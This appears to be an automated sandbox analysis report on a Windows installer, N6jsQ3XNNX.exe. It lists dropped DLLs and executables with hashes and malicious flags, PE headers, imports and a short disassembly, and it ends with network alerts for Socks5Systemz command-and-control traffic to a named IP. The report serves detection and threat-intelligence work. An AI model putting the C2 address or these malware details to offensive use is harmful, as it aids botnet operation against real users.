                                                                              MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                              SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                              SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                              SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):291245
                                                                              Entropy (8bit):6.234245376773595
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                              MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                              SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                              SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                              SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706136
                                                                              Entropy (8bit):6.517672165992715
                                                                              Encrypted:false
                                                                              SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                              MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                              SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                              SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                              SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):248781
                                                                              Entropy (8bit):6.474165596279956
                                                                              Encrypted:false
                                                                              SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                              MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                              SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                              SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                              SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):248694
                                                                              Entropy (8bit):6.346971642353424
                                                                              Encrypted:false
                                                                              SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                              MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                              SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                              SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                              SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):30994
                                                                              Entropy (8bit):5.666281517516177
                                                                              Encrypted:false
                                                                              SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                              MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                              SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                              SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                              SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):448557
                                                                              Entropy (8bit):6.353356595345232
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                              MD5:908111F583B7019D2ED3492435E5092D
                                                                              SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                              SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                              SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):65181
                                                                              Entropy (8bit):6.085572761520829
                                                                              Encrypted:false
                                                                              SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                              MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                              SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                              SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                              SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):720373
                                                                              Entropy (8bit):6.507181979060254
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:B28794FF6BAE48ED147062F1FB186735
                                                                              SHA1:C1FA95D7481FE984FAA742A7270C79C2A6057127
                                                                              SHA-256:78896DDB8AEB779ABF3E39A71655BBD83D82AE633462C42BCAB371F873E987DF
                                                                              SHA-512:9A3D2356079E8D66DFCE93672F75960981778CDCA06FFF65D4AFFAEB3FCE26FA66F6CA34685ADE67371D7F3A0F88D3378CF85E95C2EC325EDC288CD2FBE3E316
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:InnoSetup Log Jenny Video Converter, version 0x30, 6034 bytes, 760639\user, "C:\Users\user\AppData\Local\Jenny Video Converter"
                                                                              Category:dropped
                                                                              Size (bytes):6034
                                                                              Entropy (8bit):4.825421864850969
                                                                              Encrypted:false
                                                                              SSDEEP:96:tfdWk488Vp+a0239a+eOIhoNQ2dUrBXdNN6xsi6kG6k56ad2BMgnBc6weKul69WZ:FdWk48ip+a0+HIhTg6BJpAYy
                                                                              MD5:E2A9ABB784768C7D03A9136311476D66
                                                                              SHA1:D8F1EC7B0F1F8867AB1720A09B631548EA42C8EF
                                                                              SHA-256:D8E8AA06E13ECE618240AD2D2605B32C87B8ABA12A8FBBF9DDD4D05C0367BEF5
                                                                              SHA-512:C608670BB20A71BD0F1D5A1FEA3896A8C42BB3C50B1E531B619CD232D2F6648C32D5FFB10D858740DCE03581061E934EDE7E3325D41A645DBA3D30C6C3C58AEE
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):720373
                                                                              Entropy (8bit):6.507181979060254
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:B28794FF6BAE48ED147062F1FB186735
                                                                              SHA1:C1FA95D7481FE984FAA742A7270C79C2A6057127
                                                                              SHA-256:78896DDB8AEB779ABF3E39A71655BBD83D82AE633462C42BCAB371F873E987DF
                                                                              SHA-512:9A3D2356079E8D66DFCE93672F75960981778CDCA06FFF65D4AFFAEB3FCE26FA66F6CA34685ADE67371D7F3A0F88D3378CF85E95C2EC325EDC288CD2FBE3E316
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):98626
                                                                              Entropy (8bit):6.478068795827396
                                                                              Encrypted:false
                                                                              SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                              MD5:70CA53E8B46464CCF956D157501D367A
                                                                              SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                              SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                              SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\N6jsQ3XNNX.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):709120
                                                                              Entropy (8bit):6.498750714093575
                                                                              Encrypted:false
                                                                              SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:16C9D19AB32C18671706CEFEE19B6949
                                                                              SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                                              SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                                              SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4096
                                                                              Entropy (8bit):4.026670007889822
                                                                              Encrypted:false
                                                                              SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                              MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                              SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                              SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                              SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2560
                                                                              Entropy (8bit):2.8818118453929262
                                                                              Encrypted:false
                                                                              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                              MD5:A69559718AB506675E907FE49DEB71E9
                                                                              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6144
                                                                              Entropy (8bit):4.215994423157539
                                                                              Encrypted:false
                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                              MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23312
                                                                              Entropy (8bit):4.596242908851566
                                                                              Encrypted:false
                                                                              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                              Malicious:false
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.998625965057227
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              File name:N6jsQ3XNNX.exe
                                                                              File size:4'512'180 bytes
                                                                              MD5:46d2e28be5ad34097672b73bfa78e805
                                                                              SHA1:46450994830546f63d2079fddb1cd79b71584a3b
                                                                              SHA256:433c601579555db1aa2f00a2188b73306c5b8907ea17ec3f901baf35796e7a31
                                                                              SHA512:f9f11bf4fa5744b60724f6a0f59632faf7765acea2cbace3a9abae17a138193fe8eab0879ed7c1d87cb5190f7d25f15b177d8652cb2502239d4941bfdb61388c
                                                                              SSDEEP:98304:NZdqAabCU31piiFenLDSjKgPQjK0psxkklrLgx7mdxd/:/dqAadpijnLDqeFs8ErR
                                                                              TLSH:2E26332AB45D9730C1B5E974FE38A44372EE3DD21B101B25B58EACEE566B0114EE8378
                                                                              Icon Hash:2d2e3797b32b2b99
                                                                              Entrypoint:0x409c40
                                                                              Entrypoint Section:CODE
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:1
                                                                              OS Version Minor:0
                                                                              File Version Major:1
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:1
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFC4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor eax, eax
                                                                              mov dword ptr [ebp-10h], eax
                                                                              mov dword ptr [ebp-24h], eax
                                                                              call 00007F564080B7CBh
                                                                              call 00007F564080C9D2h
                                                                              call 00007F564080CC61h
                                                                              call 00007F564080EC98h
                                                                              call 00007F564080ECDFh
                                                                              call 00007F564081160Eh
                                                                              call 00007F5640811775h
                                                                              xor eax, eax
                                                                              push ebp
                                                                              push 0040A2FCh
                                                                              push dword ptr fs:[eax]
                                                                              mov dword ptr fs:[eax], esp
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040A2C5h
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              mov eax, dword ptr [0040C014h]
                                                                              call 00007F56408121DBh
                                                                              call 00007F5640811E0Eh
                                                                              lea edx, dword ptr [ebp-10h]
                                                                              xor eax, eax
                                                                              call 00007F564080F2C8h
                                                                              mov edx, dword ptr [ebp-10h]
                                                                              mov eax, 0040CE24h
                                                                              call 00007F564080B877h
                                                                              push 00000002h
                                                                              push 00000000h
                                                                              push 00000001h
                                                                              mov ecx, dword ptr [0040CE24h]
                                                                              mov dl, 01h
                                                                              mov eax, 0040738Ch
                                                                              call 00007F564080FB57h
                                                                              mov dword ptr [0040CE28h], eax
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040A27Dh
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              call 00007F564081224Bh
                                                                              mov dword ptr [0040CE30h], eax
                                                                              mov eax, dword ptr [0040CE30h]
                                                                              cmp dword ptr [eax+0Ch], 01h
                                                                              jne 00007F564081238Ah
                                                                              mov eax, dword ptr [0040CE30h]
                                                                              mov edx, 00000028h
                                                                              call 00007F564080FF58h
                                                                              mov edx, dword ptr [00000030h]
                                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                               CODE | 0x1000 | 0x9364 | 0x9400 | 2c410dfc3efd04d9b69c35c70921424e | False | 0.6147856841216216 | data | 6.560885192755103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                               DATA | 0xb000 | 0x24c | 0x400 | d5ea23d4ecf110fd2591314cbaa84278 | False | 0.310546875 | data | 2.7390956346874638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               BSS | 0xc000 | 0xe88 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                               .rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                               .reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                               .rsrc | 0x11000 | 0x2c00 | 0x2c00 | 9c8c4c33acefca10e9f3baef184db4ad | False | 0.3230646306818182 | data | 4.463574542585288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                               RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
                                                                               RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
                                                                               RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
                                                                               RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
                                                                               RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
                                                                               RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
                                                                               RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
                                                                               RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
                                                                               RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
                                                                               RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
                                                                               RT_RCDATA | 0x13010 | 0x2c | data | | | 1.2045454545454546
                                                                               RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
                                                                               RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2764900662251656
                                                                               RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
                                                                               DLL | Import
                                                                               kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                               user32.dll | MessageBoxA
                                                                               oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                               advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                               kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                               user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                               comctl32.dll | InitCommonControls
                                                                               advapi32.dll | AdjustTokenPrivileges
                                                                               Language of compilation system | Country where language is spoken | Map
                                                                               Dutch | Netherlands |
                                                                               English | United States |
                                                                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                               2024-10-08T04:13:52.485360+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63161 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:55.430626+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63161 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:56.276515+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63163 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:57.075057+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63165 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:57.430314+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63165 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:58.256550+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63166 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:59.060654+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63167 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:13:59.411684+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63167 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:00.235449+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63168 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:00.578394+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63168 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:01.398277+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63169 | 185.208.158.248 | 80 | TCP
                                                                               2024-10-08T04:14:02.218620+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
